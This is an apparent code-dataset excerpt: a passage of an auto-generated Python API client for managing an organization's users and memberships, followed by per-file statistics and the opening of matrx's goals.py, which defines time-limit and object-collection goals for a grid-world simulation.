raise ValueError("Missing the required parameter `organization_id` when calling `add_users`")
# verify the required parameter 'account_id' is set
if ('account_id' not in params) or (params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `add_users`")
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `add_users`")
collection_formats = {}
resource_path = '/v2/organizations/{organizationId}/accounts/{accountId}/users'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organizationId'] = params['organization_id']
if 'account_id' in params:
path_params['accountId'] = params['account_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NewUserResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def close_memberships(self, organization_id, user_id, request, **kwargs):
"""
Closes a user's memberships.
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.close_memberships(organization_id, user_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str user_id: The user ID Guid (required)
:param DeleteMembershipsRequest request: The details about which membership to close (required)
:return: DeleteMembershipsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.close_memberships_with_http_info(organization_id, user_id, request, **kwargs)
else:
(data) = self.close_memberships_with_http_info(organization_id, user_id, request, **kwargs)
return data
def close_memberships_with_http_info(self, organization_id, user_id, request, **kwargs):
"""
Closes a user's memberships.
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.close_memberships_with_http_info(organization_id, user_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str user_id: The user ID Guid (required)
:param DeleteMembershipsRequest request: The details about which membership to close (required)
:return: DeleteMembershipsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'user_id', 'request']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method close_memberships" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `close_memberships`")
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `close_memberships`")
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `close_memberships`")
collection_formats = {}
resource_path = '/v2/organizations/{organizationId}/users/{userId}/accounts'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organizationId'] = params['organization_id']
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteMembershipsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_user(self, organization_id, request, **kwargs):
"""
Creates a new user
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_user(organization_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param NewUserRequest request: Details about the user to be added (required)
:return: NewUserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_user_with_http_info(organization_id, request, **kwargs)
else:
(data) = self.create_user_with_http_info(organization_id, request, **kwargs)
return data
def create_user_with_http_info(self, organization_id, request, **kwargs):
"""
Creates a new user
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_user_with_http_info(organization_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param NewUserRequest request: Details about the user to be added (required)
:return: NewUserResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'request']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `create_user`")
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `create_user`")
collection_formats = {}
resource_path = '/v2/organizations/{organizationId}/users'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organizationId'] = params['organization_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NewUserResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_identities(self, organization_id, user_id, request_model, **kwargs):
"""
Deletes user identities.
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_identities(organization_id, user_id, request_model, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str user_id: The user ID Guid (required)
:param DeleteUserIdentityRequest request_model: The details for the user identities to be deleted (required)
:return: DeleteResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_identities_with_http_info(organization_id, user_id, request_model, **kwargs)
else:
(data) = self.delete_identities_with_http_info(organization_id, user_id, request_model, **kwargs)
return data
def delete_identities_with_http_info(self, organization_id, user_id, request_model, **kwargs):
"""
Deletes user identities.
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_identities_with_http_info(organization_id, user_id, request_model, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str user_id: The user ID Guid (required)
:param DeleteUserIdentityRequest request_model: The details for the user identities to be deleted (required)
:return: DeleteResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'user_id', 'request_model']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_identities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `delete_identities`")
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `delete_identities`")
# verify the required parameter 'request_model' is set
if ('request_model' not in params) or (params['request_model'] is None):
raise ValueError("Missing the required parameter `request_model` when calling `delete_identities`")
collection_formats = {}
resource_path = '/v2/organizations/{organizationId}/users/{userId}/identities'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organizationId'] = params['organization_id']
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request_model' in params:
body_params = params['request_model']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_profiles(self, organization_id, **kwargs):
"""
Returns user information.
Required scopes: user_read
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_user_profiles(organization_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str email: The email address
:return: UsersDrilldownResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_user_profiles_with_http_info(organization_id, **kwargs)
else:
(data) = self.get_user_profiles_with_http_info(organization_id, **kwargs)
return data
def get_user_profiles_with_http_info(self, organization_id, **kwargs):
"""
Returns user information.
Required scopes: user_read
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_user_profiles_with_http_info(organization_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str email: The email address
:return: UsersDrilldownResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'email']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_profiles" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `get_user_profiles`")
collection_formats = {}
resource_path = '/v2/organizations/{organizationId}/users/profile'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organizationId'] = params['organization_id']
query_params = {}
if 'email' in params:
query_params['email'] = params['email']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UsersDrilldownResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_users(self, organization_id, **kwargs):
"""
Returns information about the users in the organization
Required scopes: user_read
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_users(organization_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param int start: Index of first item to include in the response Default value: 0
:param int take: Page size of the response Default value: 20
:param int end: Index of the last item to include in the response. Ignored if 'take' parameter is specfied
:param str email: Email address of the desired user. At least one of email, account_id or organization_reserved_domain_id must be specified.
:param str email_user_name_like: Selects users by pattern matching on the user's email address
:param str status: Select users based on user status
:param str membership_status: Select users based on membership status
:param str account_id: Select users that are members of the specified account. At least one of email, account_id or organization_reserved_domain_id must be specified.
:param str organization_reserved_domain_id: Select users that are in the specified domain. At least one of email, account_id or organization_reserved_domain_id must be specified.
:param str last_modified_since: Select users whose data have been modified since the date specified; account_id or organization_reserved_domain_id must be specified.
:return: OrganizationUsersResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_users_with_http_info(organization_id, **kwargs)
else:
(data) = self.get_users_with_http_info(organization_id, **kwargs)
return data
def get_users_with_http_info(self, organization_id, **kwargs):
"""
Returns information about the users in the organization
Required scopes: user_read
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_users_with_http_info(organization_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param int start: Index of first item to include in the response Default value: 0
:param int take: Page size of the response Default value: 20
:param int end: Index of the last item to include in the response. Ignored if 'take' parameter is specfied
:param str email: Email address of the desired user. At least one of email, account_id or organization_reserved_domain_id must be specified.
:param str email_user_name_like: Selects users by pattern matching on the user's email address
:param str status: Select users based on user status
:param str membership_status: Select users based on membership status
:param str account_id: Select users that are members of the specified account. At least one of email, account_id or organization_reserved_domain_id must be specified.
:param str organization_reserved_domain_id: Select users that are in the specified domain. At least one of email, account_id or organization_reserved_domain_id must be specified.
:param str last_modified_since: Select users whose data have been modified since the date specified; account_id or organization_reserved_domain_id must be specified.
:return: OrganizationUsersResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'start', 'take', 'end', 'email', 'email_user_name_like', 'status', 'membership_status', 'account_id', 'organization_reserved_domain_id', 'last_modified_since']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_users" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `get_users`")
collection_formats = {}
resource_path = '/v2/organizations/{organizationId}/users'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organizationId'] = params['organization_id']
query_params = {}
if 'start' in params:
query_params['start'] = params['start']
if 'take' in params:
query_params['take'] = params['take']
if 'end' in params:
query_params['end'] = params['end']
if 'email' in params:
query_params['email'] = params['email']
if 'email_user_name_like' in params:
query_params['email_user_name_like'] = params['email_user_name_like']
if 'status' in params:
query_params['status'] = params['status']
if 'membership_status' in params:
query_params['membership_status'] = params['membership_status']
if 'account_id' in params:
query_params['account_id'] = params['account_id']
if 'organization_reserved_domain_id' in params:
query_params['organization_reserved_domain_id'] = params['organization_reserved_domain_id']
if 'last_modified_since' in params:
query_params['last_modified_since'] = params['last_modified_since']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationUsersResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_email_address(self, organization_id, request, **kwargs):
"""
Updates a user's email address.
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_email_address(organization_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param UpdateUsersEmailRequest request: The details about which email addresses to update (required)
:return: UsersUpdateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_email_address_with_http_info(organization_id, request, **kwargs)
else:
(data) = self.update_email_address_with_http_info(organization_id, request, **kwargs)
return data
def update_email_address_with_http_info(self, organization_id, request, **kwargs):
"""
Updates a user's email address.
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_email_address_with_http_info(organization_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param UpdateUsersEmailRequest request: The details about which email addresses to update (required)
:return: UsersUpdateResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'request']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_email_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `update_email_address`")
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `update_email_address`")
collection_formats = {}
resource_path = '/v2/organizations/{organizationId}/users/email_addresses'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organizationId'] = params['organization_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UsersUpdateResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_user(self, organization_id, request, **kwargs):
"""
Updates a user.
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_user(organization_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param UpdateUsersRequest request: The user details to update (required)
:return: UsersUpdateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_user_with_http_info(organization_id, request, **kwargs)
else:
(data) = self.update_user_with_http_info(organization_id, request, **kwargs)
return data
def update_user_with_http_info(self, organization_id, request, **kwargs):
"""
Updates a user.
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_user_with_http_info(organization_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param UpdateUsersRequest request: The user details to update (required)
:return: UsersUpdateResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'request']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `update_user`")
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `update_user`")
collection_formats = {}
resource_path = '/v2/organizations/{organizationId}/users/profiles'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organizationId'] = params['organization_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UsersUpdateResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 46.822967
| 200
| 0.602068
| 6,133
| 58,716
| 5.535464
| 0.041904
| 0.070105
| 0.028278
| 0.021208
| 0.953283
| 0.940882
| 0.936198
| 0.932104
| 0.92583
| 0.904857
| 0
| 0.000625
| 0.319112
| 58,716
| 1,253
| 201
| 46.860335
| 0.848545
| 0.342632
| 0
| 0.774038
| 0
| 0
| 0.212845
| 0.043371
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033654
| false
| 0
| 0.011218
| 0
| 0.094551
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d576b4aeb3fea5dafc9568ed16cab8d52dc8153
| 34,115
|
py
|
Python
|
matrx/goals/goals.py
|
matrx-software/matrx
|
5b36ef1018e85172dc88cd7467e3087ef94c58ba
|
[
"MIT"
] | 6
|
2020-03-02T10:42:34.000Z
|
2021-05-16T12:21:25.000Z
|
matrx/goals/goals.py
|
matrx-software/matrx
|
5b36ef1018e85172dc88cd7467e3087ef94c58ba
|
[
"MIT"
] | 262
|
2020-02-27T13:37:40.000Z
|
2022-03-29T11:44:57.000Z
|
matrx/goals/goals.py
|
matrx-software/matrx
|
5b36ef1018e85172dc88cd7467e3087ef94c58ba
|
[
"MIT"
] | 3
|
2020-02-27T12:59:22.000Z
|
2021-12-10T13:53:58.000Z
|
import copy
import itertools
import warnings
import numpy as np
import matrx
from matrx import utils
from matrx.objects.standard_objects import CollectionTarget, CollectionDropOffTile
class WorldGoal:
"""
A class that tracks whether the simulation has reached its global goal.
.. deprecated:: 2.1.0
`WorldGoal` will be removed in the future, it is replaced by
`WorldGoalV2` because the latter works with the
:class:`matrx.agents.agent_utils.state.State` object.
"""
def __init__(self):
"""
We set the self.is_done to False as a start.
"""
warnings.warn(
f"{self.__class__.__name__} will be updated in the future towards {self.__class__.__name__}V2. Switch to "
f"the usage of {self.__class__.__name__}V2 to prevent future problems.",
DeprecationWarning,
)
self.is_done = False
def goal_reached(self, grid_world):
"""
Returns whether the global goal of the simulated grid world is accomplished. This method should be overridden
by a new goal function.
Parameters
----------
grid_world : GridWorld
An up to date representation of the grid world that will be analyzed in this function on
whether a specific coded global goal is reached.
Returns
-------
goal_reached : bool
True when the goal is reached, False otherwise.
"""
pass
def get_progress(self, grid_world):
"""
Returns the progress of reaching the global goal in the simulated grid world. This method can be overridden
if you want to track the progress. But is not required.
Parameters
----------
grid_world : GridWorld
An up to date representation of the grid world that will be analyzed in this function on
how far we are in obtaining the global world goal.
Returns
-------
progress : float
Representing with 0.0 no progress made, and 1.0 that the goal is reached.
"""
pass
def reset(self):
""" Resets this goal's completion boolean and returns a copy of this object."""
self.is_done = False
return copy.deepcopy(self)
class LimitedTimeGoal(WorldGoal):
"""
A world goal that simply tracks whether a maximum number of ticks has been reached.
"""
def __init__(self, max_nr_ticks):
""" Initialize the LimitedTimeGoal by saving the `max_nr_ticks`.
"""
super().__init__()
self.max_nr_ticks = max_nr_ticks
def goal_reached(self, grid_world):
""" Returns whether the number of specified ticks has been reached.
Parameters
----------
grid_world : GridWorld
An up to date representation of the grid world that will be analyzed in this function on
whether a specific coded global goal is reached.
Returns
-------
goal_reached : bool
True when the goal is reached, False otherwise.
Examples
--------
For an example, see :meth:`matrx.grid_world.__check_simulation_goal`
Checking all simulation goals from e.g. action, world goal, or somewhere else with access to the Gridworld,
the function can be used as below:
>>> goal_status = {}
>>> if grid_world.simulation_goal is not None:
>>> if isinstance(grid_world.simulation_goal, list):
>>> for sim_goal in grid_world.simulation_goal:
>>> is_done = sim_goal.goal_reached(grid_world)
>>> goal_status[sim_goal] = is_done
>>> else:
>>> is_done = grid_world.simulation_goal.goal_reached(grid_world)
>>> goal_status[grid_world.simulation_goal] = is_done
>>>
>>> is_done = np.array(list(goal_status.values())).all()
"""
nr_ticks = grid_world.current_nr_ticks
if self.max_nr_ticks == np.inf or self.max_nr_ticks <= 0:
self.is_done = False
else:
if nr_ticks >= self.max_nr_ticks:
self.is_done = True
else:
self.is_done = False
return self.is_done
def get_progress(self, grid_world):
""" Returns the progress of reaching the LimitedTimeGoal in the simulated grid world.
Parameters
----------
grid_world : GridWorld
An up to date representation of the grid world that will be analyzed in this function on
how far we are in obtaining the global world goal.
Returns
-------
progress : float
Representing with 0.0 no progress made, and 1.0 that the goal is reached.
Examples
--------
Checking all simulation goals from e.g. action, world goal, or somewhere else with access to the Gridworld,
the function can be used as below.
In this example we know there is only 1 simulation goal.
>>> progress = grid_world.simulation_goal.get_progress(grid_world)
>>> print(f"The simulation is {progress * 100} percent complete!")
"""
if self.max_nr_ticks == np.inf or self.max_nr_ticks <= 0:
return 0.
return min(1.0, grid_world.current_nr_ticks / self.max_nr_ticks)
class CollectionGoal(WorldGoal):
def __init__(self, name, target_name, in_order=False):
super().__init__()
# Store the attributes
self.__area_name = name
self.__target_name = target_name
self.__in_order = in_order
# Set attributes we will use to speed up things and keep track of collected objects
self.__drop_off_locs = None # all locations where objects can be dropped off
self.__target = None # all (ordered) objects that need to be collected described in their properties
self.__dropped_objects = {} # a dictionary of the required dropped objects (id as key, tick as value)
self.__attained_rank = 0 # The maximum attained rank of the correctly collected objects (only used if in_order)
def goal_reached(self, grid_world):
if self.__drop_off_locs is None: # find all drop off locations, its tile ID's and goal blocks
self.__drop_off_locs = []
self.__find_drop_off_locations(grid_world)
# Raise exception if no drop off locations were found.
if len(self.__drop_off_locs) == 0:
raise ValueError(f"The CollectionGoal {self.__area_name} could not find a "
f"{CollectionDropOffTile.__name__} with its 'collection_area_name' set to "
f"{self.__area_name}.")
if self.__target is None: # find all objects that need to be collected (potentially in order)
self.__target = []
self.__find_collection_objects(grid_world)
# Go all drop locations and check if the requested objects are there (potentially dropped in the right order)
is_satisfied = self.__check_completion(grid_world)
self.is_done = is_satisfied
return is_satisfied
def __find_drop_off_locations(self, grid_world):
all_objs = grid_world.environment_objects
for obj_id, obj in all_objs.items():
if 'name' in obj.properties.keys() \
and self.__area_name == obj.properties['name']:
loc = obj.location
self.__drop_off_locs.append(loc)
def __find_collection_objects(self, grid_world):
all_objs = grid_world.environment_objects
for obj_id, obj in all_objs.items():
if 'collection_zone_name' in obj.properties.keys() \
and self.__area_name == obj.properties['collection_zone_name']\
and 'collection_objects' in obj.properties and 'is_drop_off_target' in obj.properties\
and obj.properties['is_drop_off_target']:
self.__target = obj.properties['collection_objects'].copy()
# Raise warning if no target object was found.
if len(self.__target) == 0:
warnings.warn(f"The CollectionGoal {self.__area_name} could not find a {CollectionTarget.__name__} "
f"object or its 'collection_objects' property is empty.")
def __check_completion(self, grid_world):
# If we were already done before, we return the past values
if self.is_done:
return self.is_done
# Get the current tick number
curr_tick = grid_world.current_nr_ticks
# Retrieve all objects and the drop locations (this is the most performance heavy; it loops over all drop locs
# and queries the world to locate all objects at that point through distance calculation. Note: this calculation
# is not required, as the range is zero!).
obj_ids = [obj_id for loc in self.__drop_off_locs
for obj_id in grid_world.get_objects_in_range(loc, sense_range=0, object_type=None).keys()]
# Get all world objects and agents
all_objs = grid_world.environment_objects
all_agents = grid_world.registered_agents
all_ = {**all_objs, **all_agents}
# Go through all objects at the drop off locations. If an object was not already detected before as a
